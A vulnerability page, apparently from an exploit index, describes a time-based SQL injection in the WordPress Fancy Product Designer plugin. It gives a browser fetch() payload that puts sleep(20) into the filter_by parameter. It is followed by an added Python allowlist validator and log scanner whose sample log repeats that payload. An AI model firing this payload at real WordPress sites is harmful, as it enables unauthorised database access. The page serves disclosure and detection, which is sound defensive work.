## https://sploitus.com/exploit?id=WPEX-ID:4B8B9638-D52A-40BC-B298-AE1C74788C18
- Log in as an administrator and visit /wp-admin/.
- Add a Catalog Product at /wp-admin/admin.php?page=fancy_product_designer.
- Search the page source for "fpd_dismiss_notification" and note the nonce associated with it.
- Run the following fetch() call in your browser's console, replacing $NONCE with that nonce:

```javascript
fetch('/wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=$NONCE&filter_by=ID%2c(select*from(select(sleep(20)))a)&sort_by=ASC&page=1&type=catalog').then(x=>x.text()).then(x=>console.log(x))
```

Notice that the server takes approximately 20 seconds to answer, which confirms that the injected SQL (the sleep(20) carried in filter_by) was executed by the database.
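The root cause here is a caller-supplied `filter_by`/`sort_by` value reaching an ORDER BY clause, where it cannot be bound as a prepared-statement parameter; the fix is an allowlist of column names and directions, and the same allowlist doubles as a detection rule over web-server logs. The following is an added example, not code from the page or from the Fancy Product Designer plugin (which is PHP): the column names in `ALLOWED_FILTER_COLUMNS`, the log lines, and the `NONCE_PLACEHOLDER` value are all assumed or constructed. The second sample log line carries the probe shown above, so the scan flags exactly that request.

```python
"""Allowlist check for sort/filter parameters, plus a log scan that applies it.

Added example for the fpd_get_products issue on this page; not the plugin's code.
Column names in ALLOWED_FILTER_COLUMNS are assumed, not taken from the plugin.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, urlsplit

# Assumed names of the columns a catalog listing may be ordered by.
ALLOWED_FILTER_COLUMNS = frozenset({"ID", "title", "date"})
ALLOWED_SORT_DIRECTIONS = frozenset({"ASC", "DESC"})

# Constructed access-log lines in Common Log Format. The second request carries
# the time-based probe shown on this page; the nonce value is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=NONCE_PLACEHOLDER&filter_by=ID&sort_by=ASC&page=1&type=catalog HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=NONCE_PLACEHOLDER&filter_by=ID%2c(select*from(select(sleep(20)))a)&sort_by=ASC&page=1&type=catalog HTTP/1.1" 200 512
198.51.100.7 - - [10/Oct/2023:13:57:12 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 64
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def validate_sort_params(filter_by: str, sort_by: str) -> tuple[str, str]:
    """Return (column, direction) only if both are on the allowlist.

    This is the shape of check a handler must perform before a caller-supplied
    value is placed into an ORDER BY clause: identifiers cannot be bound as
    prepared-statement parameters, so an allowlist (not escaping) is the fix.
    """
    column = filter_by.strip()
    direction = sort_by.strip().upper()
    if column not in ALLOWED_FILTER_COLUMNS:
        raise ValueError(f"filter_by not in allowlist: {column!r}")
    if direction not in ALLOWED_SORT_DIRECTIONS:
        raise ValueError(f"sort_by not in allowlist: {direction!r}")
    return column, direction


def check_request_target(target: str) -> str | None:
    """Return a reason string if an admin-ajax request's sort parameters fail
    validation, or None if the request is clean or takes no sort parameters."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin-ajax.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "filter_by" not in params and "sort_by" not in params:
        return None
    filter_by = params.get("filter_by", [""])[0]
    sort_by = params.get("sort_by", [""])[0]
    try:
        validate_sort_params(filter_by, sort_by)
    except ValueError as exc:
        return str(exc)
    return None


def scan_log(log_text: str) -> list[dict]:
    """Apply check_request_target to every request line; return the flagged ones."""
    flagged = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        reason = check_request_target(target)
        if reason is not None:
            action = parse_qs(urlsplit(target).query).get("action", [""])[0]
            flagged.append({
                "client": line.split(" ", 1)[0],
                "action": action,
                "reason": reason,
            })
    return flagged


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']} action={hit['action']}: {hit['reason']}")
```

Running the script against real logs only requires replacing `SAMPLE_LOG` with the file contents; because the rule is an allowlist rather than a keyword blocklist, it also catches probes that avoid the word `sleep`, at the cost of needing the real column names filled in.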